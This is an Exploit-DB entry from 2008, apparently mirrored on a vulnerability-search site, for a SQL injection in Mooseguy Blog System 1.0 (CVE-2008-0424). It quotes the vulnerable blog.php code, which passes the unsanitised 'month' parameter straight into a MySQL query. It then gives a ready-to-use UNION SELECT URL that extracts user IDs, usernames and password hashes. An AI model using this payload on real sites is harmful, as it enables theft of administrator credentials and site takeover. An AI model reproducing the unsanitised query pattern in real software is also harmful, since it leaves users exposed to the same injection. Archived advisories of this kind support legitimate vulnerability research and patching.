Lucene search
The_HuliGunEDB-ID:4951HistoryJan 21, 2008 - 12:00 a.m.
Mooseguy Blog System 1.0 - 'month' SQL Injection
2008-01-2100:00:00
The_HuliGun
www.exploit-db.com
22
AI Score
7.4
Confidence
Low
# MGBS 1.0 Remote SQL injection
# Script url http://sourceforge.net/project/showfiles.php?group_id=193233
# Vulnerable code in blog.php
<?php
$month = $_GET['month'];
$result = mysql_query("SELECT * FROM blog WHERE posted='$month' ORDER BY id DESC") or die("HELP QUERY BROKEN");
...
# Admin hash exploit
http://[target]/[path]/blog.php?month='+union+select+1,2,3,4,5,concat_ws(0x3a,id,uname,upass),7,8+from+users/*
# Bug discovered by The_HuliGun
# Greetz to: forum.antichat.ru
# milw0rm.com [2008-01-21]Related
cvelist
cvelist
CVE-2008-0424
2008-01-23 21:00:00
cve
cve
CVE-2008-0424
2008-01-23 22:00:00
prion
prion
Sql injection
2008-01-23 22:00:00
nvd
nvd
CVE-2008-0424
2008-01-23 22:00:00